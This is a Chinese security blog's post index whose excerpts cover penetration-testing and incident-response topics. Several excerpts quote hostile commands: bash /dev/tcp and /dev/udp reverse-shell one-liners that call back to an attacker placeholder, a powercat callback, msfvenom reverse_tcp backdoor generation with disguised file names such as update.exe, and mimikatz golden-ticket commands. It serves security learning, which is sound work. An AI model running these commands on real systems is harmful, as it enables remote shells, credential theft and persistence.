- 博客(36)
- 收藏
- 关注
RSS订阅原创 应急响应:ARP欺骗实战
定义:ARP是一个TCP/IP协议,用于将IP地址映射到物理网络地址(MAC地址)。作用:在局域网通信中,当设备有数据要发送给另一个设备时,需要知道对方的MAC地址。ARP协议允许设备通过IP地址找到对应的MAC地址,以便进行通信。工作原理:主机发送信息时,将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址。收到返回消息后,将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。安全性。
2024-10-22 17:54:56
846
原创 应急响应:DHCP$DNS劫持实战
1.随机的攻击方式,在局域网内,通过构造一个假的DHCP服务器,在内网机器获取DHCP时看谁dhcp的响应速度快, 哪个快哪个就是DNS或者DHCP的IP地址,可以用于钓鱼(在同一局域网内)重定向到攻击机器的阿帕奇服务,这个就是DNS劫持,我们可以通过DNS劫持来进行构造钓鱼网站,因为这里只有两台机器可以上网,在实际情况中,可以构造一个登录页面。3.钓鱼:比如说你访问百度网页,你在DHCP配置中设置了百度跳转页面,受害者只要访问百度,就会重定向到其他网页,可以做一个登录框,进行攻击。
2024-10-09 21:42:04
1398
原创 应急响应:Linux&Windows实战排查
络安全应急响应是指团队或组织为了在网络安全事件发生时能够及时准确地做出反应和应对而建立的一套制度和流程,旨在降低网络安全事件所造成的损失并迅速恢复受影响的系统和服务。网络安全应急响应的核心内容包括:预警评估,通过挖掘威胁情报和漏洞信息进行风险评估和预警;事件响应,组织专业人员进行快速响应,包括定位、分析和修复;事后总结,明确问题原因和解决方案,并进行风险评估;技术支持,提供网络安全技术支持以提高网络的安全性;培训教育,提升组织内部员工的安全意识和应急响应能力。
2024-10-08 19:57:08
1005
原创 社会工程学:社工无处不在
社会工程学是一种非技术性攻击,它利用人类的弱点,比如好奇心、信任、恐惧、无知和疏忽等,来获取信息或者进入安全措施保护下的系统。宏病毒是一种新形态的计算机病毒,也是一种跨平台式计算机病毒,可以存储在Microsoft 365文件(如文档、演示文稿、工作簿或模板)的宏中,或者存储在任何ActiveX控件、COM加载项或Microsoft 365加载项中。5.加强员工培训:在公司内部,要加强员工的安全意识和培训,教育员工如何避免成为社会工程学攻击的受害者,以及如何保护公司的敏感信息和资产。
2024-10-06 20:30:23
1167
原创 内网安全:反弹shell
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2。powercat -c 攻击机器IP -p 9999 -v -ep。
2024-09-10 20:38:52
1578
原创 内网隧道:端口转发
端口转发和端口映射端口转发,有时被称为做隧道,是安全壳( SSH)为网络安全通信使用的一种方法简单来说,端口转发就是将 一个端口收到的流量转发到另一个端口。端口映射是 NAT的一种,功能是把在公网的地址转成私有地址。简单来说,端口映射就是将一个端口映射 到另一个端口供其他人使用端口转发:只针对于机器的某个特定端口本次实验三种端口转发:LCXSSHNETSH。
2024-09-07 10:23:57
1115
原创 域内安全:委派攻击
从攻击角度来说:如果攻击者拿到了一台配置了非约束委派的机器权限,可以诱导管理员来访问该机器,然后可以得到管理员的TGT,从而模拟管理员访问任意服务,相当于拿下了整个域环境,或者结合打印机漏洞让域管用户强制回连以缓存 TGT,一个域内用户访问WEB服务,但是一些资源在文件服务上,这个时候就需要委派,需要web系统代表用户A去访问文件服务的资源。3、这个时候如果域管访问了机器我们的内存中就会有域管的TGT,就可以访问任意机器了,在与域控上执行访问(在域控上执行)
2024-08-30 20:46:19
1260
原创 内网安全:跨域攻击
mimikatz kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi。Kerberos::golden /user:administrator /domain:当前域名 /sid:当前SID /sids:目标域SID519 /krbtgt:krbtgt散列 /ptt。查看当前域中计算机的权限。
2024-08-18 17:25:38
1515
原创 域控安全:读取ntds.dit文件中的hash值
在线的方式就是直接读取不需要在导出ntds文件,在域环境中,不要直接在线获取hash,特别是域环境比较大的时候,在线获取hash等待时时间较长,工具占用资源太多,容易造成域控服务器崩溃。2.将ntds.dit文件复制到这个工具目录里面然后导出,两个重要的表为:datatable以及link_table,他们都会被存放在./ntds.dit.export/文件夹中。使用secretsdump直接读取,需要有高权限的票据,IPC,什么的,可以远程读取目标机器的hash,就是远程读取。2、然后利用再在本地进行。
2024-08-08 00:15:00
971
原创 域控安全:多种方式提取ntds.dit
ntds.dit为AD的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。可以通过创建一个 IFM 的方式获取 ntds.dit,在使用 ntdsutil 创建媒体安装集(IFM)时,需要进行生成快照、加载、将 ntds.dit 和计算机的 SAM 文件复制到目标文件夹中等操作,这些操作也可以通过PowerShell 或 VMI 远程执行。第三步:复制快照中的ntds.dit文件。第二步:创建一个C盘的卷影副本。
2024-08-07 14:37:32
1118
原创 内网安全:多种横向移动方式
DCOM:DCOM(分布式组件对象模型)是微软的一系列概念和程序接口。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求,使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件获取DCOM列表:实验前提:1.关闭防火墙2.必须有管理员权限。
2024-08-03 23:12:25
1123
原创 WMI横向
WMI:psexec被杀软禁用,WMI是一种新型的横向移动工具,本身的组织架构是数据库架构,在用WMI进行横向时,Windows操作系统不会将WMI的操作记录在日志中。简单来说:wmic就是wmic.exe,位于windows目录底下,是一个命令行程序。WMIC可以以两种模式执行:交互模式(Interactive mode)和非交互模式(Non-Interactive mode),WMI就是 WindowsManagement Instrumentation(Windows 管理规范)。
2024-07-29 22:39:48
831
原创 PsExec横向:IPC&PTH&PTT
PsExec工具:psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口,只需要对方开启admin$共享和ipc$ (该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火墙禁止445端口连接),psexec也是不能使用的,会提示找不到网络路径。
2024-07-28 17:45:22
978
原创 内网横向:PTH&PTK&PTT
条件:有管理员的NTLM Hash 并且目标机器开 放445端口在工作组环境中: Windows Vista 之前的机器,可以使用本地管理员组内用户进行攻击。WindowsVista 之后的机器,只能是administrator用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问。
2024-07-25 23:30:40
1059
原创 内网安全:IPC横向
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
2024-07-23 15:42:50
786
1
原创 内网安全:各类密码的抓取
sam文件和lsass进程就是Windows存储本地密码的文件和进程,我们可以通过读取sam文件和lsass进程,可以获得本地的用户密码,从而进行内网横向。
2024-07-21 21:28:13
2298
2
原创 Windows认证LM Hash和NTLM Hash以及认证协议
Windows密码一般放在:c://windows/system/config/SAM我们在winlogon.exe输入密码时,会发送到lsass.exe 去转化为NTLM Hash与SAM文件中的值去对比 ,如果相同,将user id 与group id 发送给winlogon.exe 准备桌面,登录成功。不同则失败LM Hash和NTLM Hash:Windows中的密码一般由两部分组成,一部分是LM哈希和NTLM哈希Hash 结构:username:RID:LM‐HASH:NT‐HASH。
2024-07-19 16:45:52
982
原创 内网安全:权限维持的各种姿势
监听:msfconsole -x "use exploit/multi/handler;MSF后门和监听:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9997 -f exe -o update.exe。MSF后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9999 -f exe -o kms.exe。
2024-07-12 20:05:47
2265
原创 内网安全:域内信息探测
四种情况:1.本地用户:user2.本地管理员用户:家庭版禁用,server才有3.域内用户4.域内管理员本地普通用户不能获取域内信息本地管理员用户,可以直接提权为system用户(域内用户),可以获取域内信息一.判断域是否存在:1.查看域:ipconfig/all 或 systeminfo 或net config workstation。
2024-07-11 17:17:10
1873
原创 内网信息收集:手动、脚本和工具查IP、端口
以下命令在CS执行时命令前须加shell,如:shell ipconfig1.收集IP网卡: ipconfig2.收集操作系统和软件信息: systeminfo3.查看操作系统的体系结构:echo %PROCESSOR_ARCHITECTURE%4.查看目录和文件夹:shell dir shell type 文件名5.查看操作系统的软件及版本信息:6.本机的服务信息: wmic service list brief。
2024-07-08 23:58:32
1451
1
原创 CobaltStrike的内网安全
介绍:CobaltStrike分为服务端和客户端,一般我们将服务端放在kali,客户端可以在物理机上面,或者虚拟机都可以启动服务端,首先创建一个监听(注意,这里要关闭kali的Apache服务,要不然端口占用创建监听不成功)payload选择Beacon HTTP ,HTTP Hosts选择服务器的IP点击save接着我们用CS生成一个payload(Windows exe),使得我靶机上线:Lisrener选择我们创建的监听服务,点击Launch。
2024-07-05 18:54:49
1387
原创 客户端渗透
介绍:我们要进行客户端渗透,我们生成一个可执行程序,也是简单粗暴,MSF建立监听,把它发给受害者,只要受害者点击,监听机监听的机器直接上线(现在这种方法一般不会成功,杀毒软件会直接杀掉,这个程序可以经过几种语言编码,降低杀毒软件的防范可能直接免杀,虽然不能实际直接使用,但可以让我们了解和预防这类的攻击,本质上是一样的) 生成一个带有反弹连接的EXE程序:开启Apache服务使能够下载:访问这个虚拟机IP及其对应的文件,下载放在靶机上面去,并且关闭杀毒软件,要不然会直接把程序清除MSF开启监听:我们点击我们下
2024-07-03 22:24:05
851
原创 一次DC9靶机的渗透测试
探测存活主机发现主机探测端口和服务:HTTP服务,浏览器打开看一下:一番查找发现SQL注入:回显:我们先看是什么请求:发现post请求,参数search,直接上SQLmap一把梭:先查看数据库:查看users的表名:直接查看数据:这个可能是CMS的登录账号密码,但不知道对应哪一个,做一个字典,直接上BP爆破我们随便填一个用户名密码填上字典,开始爆破结果返回:我将长度排列了一下,发现并没有特别的,说明这不是登录的账号密码,结合之前我们在SQL注入的时候还发现了一个staff,我们查看一下:查看Users:又发
2024-06-26 15:04:03
1172
3
原创 一次DC1靶机的渗透测试
原因:若是对一些特殊命令设置了SUID,那么就会有被提权的风险,常用的SUID提权命令有nmap、vim、find、bash、more、less、nano、awk和cp等。让我们提权,得到root用户,那么返回我们的命令行,这里提权我们可以利用的是find。发现管理员用户和密码,但是不知道密码是什么,在这里,采用密码替换。因为这是一个Drupal的管理系统,那么我们搜索是否有这个漏洞。那么我们试一下是否有权限,我们新建一个文件,然后进行命令执行。正好发现了一个我们之前获得的数据库名,那么,我们切换数据库。
2024-06-23 23:32:47
995
原创 一次breach1靶机的渗透测试
首先进行主机发现,找到目标机器:找到目标机器,进行端口扫描:一共扫到996个开放的端口,正好里面有一个HTTP服务,我们在网页打开看一下:打开源码发现一个加密的东西,应该是MD5,解密得到:pgibbons:damnitfeel$goodtobeagang$ta这看起来像是一个账号和密码我们继续找一些有用的信息,又发现了一个CMS的管理后台我们对最初的目录进行目录扫描,看有没有什么遗漏的东西:dirb打开看一下:继续扫一下CMS:whatweb -v。
2024-06-22 14:54:36
1004
原创 一次prime1靶机的渗透测试
什么也没有,说明我们找的参数不对,这里我们可以继续用FUZZ进行爆破参数,但是Linux里面,密码大多数存储在 /etc/passwd里面,我们试一下。查找对应的漏洞版本,后面有一个脚本,我们需要把它编译为我们需要利用的,然后传到目标靶机里面,然后执行,就可以提升到root权限。爆出信息,接下来我们进行提权获取root权限,因为爆出了操作系统,我们查看操作系统的漏洞,进入msfconsole。这里我们可以利用WordPress的漏洞,我们可以用漏扫工具扫一下,
2024-06-19 23:20:54
1230
原创 CVE SaltStack命令注入漏洞复现
组合这两个漏洞,将可以使未授权的攻击者通 过Salt API执行任意命令 影响范围 SaltStack < 3002.1 SaltStack < 3001.3 SaltStack < 3000.5 SaltStack < 2019.2.7。因为这里的&被过滤了,我们将&进行URL编码为%26 ,这里的456.sh 是我们创建的一个可执行文件。我们在下面添加一条数据,点击发送,这是一条在docker容器里面添加文件的命令。启动成功以后我们在浏览器输入启动的环境IP和端口,查看是否启动成功。
2024-06-16 18:01:13
716
原创 CVE Docker逃逸漏洞的复现
它允许开发者将他们的应用及其依赖包打包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,并且实现虚拟化。docker可以安装软件,也可以安装一个操作系统。需要在不同操作系统中引入一个中间层,中间层很多版本,可以在Windows、Linux、centos等等的不同操作系统之间引入一个中间层,可以用来屏蔽底层环境的差异。靶机:需要先运行一个拥有命令行的镜像比如 ubuntu:18.04 ,我们需要在进入镜像,在容器的命令行执行下载远程恶意文件,我们给他增加权限,然后执行。
2024-06-15 00:00:00
838
原创 CVE Struts2 s2-062 ONGL的漏洞复现
{}解析OGNL表达式,对用户输入 的内容进行二次解析的时候,如果没有验证, 可能导致远程代码执行,他会自动计算结果,并把结果自动赋值给Struts的标签的地方,我们可以再试一下,我们将6*6改为 9*9。然而,值得注意的是,Struts2在某些版本中存在远程代码执行漏洞,因此在使用Struts2进行开发时,需要确保使用最新的、已经修复漏洞的版本,并采取必要的安全措施来保护应用程序的安全性。项目使用了%{}解析OGNL表达式,对用户输入 的内容进行二次解析的时候,如果没有验证, 可能导致远程代码执行。
2024-06-14 00:00:00
803
原创 【终极版本】 kali扩充sda1磁盘空间
因为我的sda1也满了,我在网上翻了好几个资料,我都试了试,有一个清理磁盘命令我以为是清理不常用的东西和缓存,但是我执行之后直接把我虚拟机的可视化屏幕删了,我打不开虚拟机了,我直接老实了,不敢再随便试那些清理命令了,经过我几个小时的努力,终于把sda1扩充好了,写这篇文章给大家避避坑。这里面大多数是我们的缓存,根据自己的情况进行清理,也可以降低sda1的使用率。第一步,我们首先将linux-swap删除,删除之前要。重复上面的操作,建立我们的swap。这是我扩充好的,我们直接用这个命令查看。
2024-06-13 00:04:49
604
原创 CVE springrce远程代码执行漏洞的IDEA复现
后面就是我们的参数值,因为我们定义一个name的属性,那么我们就会自动找到user对象name的属性,并且赋值给它,为了验证。还支持子属性的赋值,因为有一个department的属性,通过.name,找到department的name的值,把sec的值赋值给它。可以减少我们各种各样的get,post,set、name的代码的写法,这种就叫参数自动绑定,给我们的编码带来便利。方法,拿到Department对象的setName()的方法,才把sec的值赋值。作用:对Spring容器中管理的对象,自动调用。
2024-06-12 00:59:37
1105
原创 Spring Cloud Gateway RCE漏洞的IDEA复现
我们首先了解一些基础知识spring cloud 微服务架构Spring Cloud微服务架构是一种基于Spring Framework的开源微服务架构解决方案。它将一个大型的单个应用程序和服务拆分为数个甚至数十个支持微服务的小应用,这些小应用可独立地进行开发、管理和迭代。Spring Cloud提供了一系列工具和框架,帮助开发者快速构建和部署微服务应用。其主要特点包括微服务支持、开放性和可扩展性、高可用性和容错性,以及基于云原生架构的部署能力。
2024-06-11 00:25:20
1401
原创 CVE Log4j2的远程代码执行漏洞的IDEA复现
攻击者构造一个恶意的class文件,然后上传到服务器上,开始监听,然后我们要客户端用构造的JNDI 去查找目标服务器的LDAP的数据,我们构造一个不存在的数据让他找,他找不到,然后会自动去执行我们传上去的地址去下载,下载完以后会自动执行。,它使用的最大优势就是可以将不同系统的数据集中在一起,从而避免了我们每次访问不同系统时都需要登录账号密码,使用LDAP,可以使我们只用登录一个账号和密码就可以找到我们需要的数据。在LDAP寻找不到我们查找的数据的时候,它就会自动执行我们传上去的恶意地址去下载,并且执行。
2024-06-09 12:59:42
993
原创 XCTF Wireshark
说明图片里面有隐藏信息要让我们解密,回到之前我们发现了两张图片,我们将两张图片分离出来,先将%5c(1)拖到010里面,因为这是一个png图片我们直接搜索89 50,把前面的内容都删了。回到之前我们打开的网址将图片放上去,因为有密码,那么我们要先找到密码,因为我们分离了两张图片,我猜测密码在第一个图片里面。我们打开一个HTTP流,发现里面东西还挺多,这是一个html代码,并且HTTP流的数据包挺少的,那么我们对他们依次进行VScode查看,发现%5c(1)和%5c(4)都是有png图片,
2024-05-28 23:40:33
441
原创 XCTF traffic
我们用flag的变形f1ag,fl4g,f14g搜索,还是没有搜到什么东西,到这里,这道题跟以往做过的不一样,那么我们观察流量包,发现里面有TLSv1.2 ,TCP,ICMP,DNS 等等协议,相比于之前我们做的题目,一般都是TCP,HTTP的流量包,那么我们从这几个不常见的流量包下手,先从TLSv1.2开始,我们不知道TLSv1.2是什么,可以百度一下,说是用于在网络通信中提供加密和身份验证的协议,那么我们打开一个TLSv1.2的追踪流。我们就试一下144,
2024-05-27 07:00:00
327
原创 XCTF之流量分析
1.我们先下载附件将其直接拖到wireshark中,这种题一般都是找flag,我们在搜索框中直接搜flag发现我们追踪流发现GET请求是盲注并且加密,那么我们进行URL解密,这里是解的两次密果然是盲注,那么我们返回请求包看它是否请求成功,因为这是HTTP协议,那么我们进行导出对象HTTP,通过查看大小,我们发现大部分都是492,之后发现一个518,这种大小不一样的,一般请求成功我们点一下发现它的长度是695,那么我们进行过滤695长度的HTTP流量包,http && frame.len ==695接着我们查
2024-05-26 17:49:17
517
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人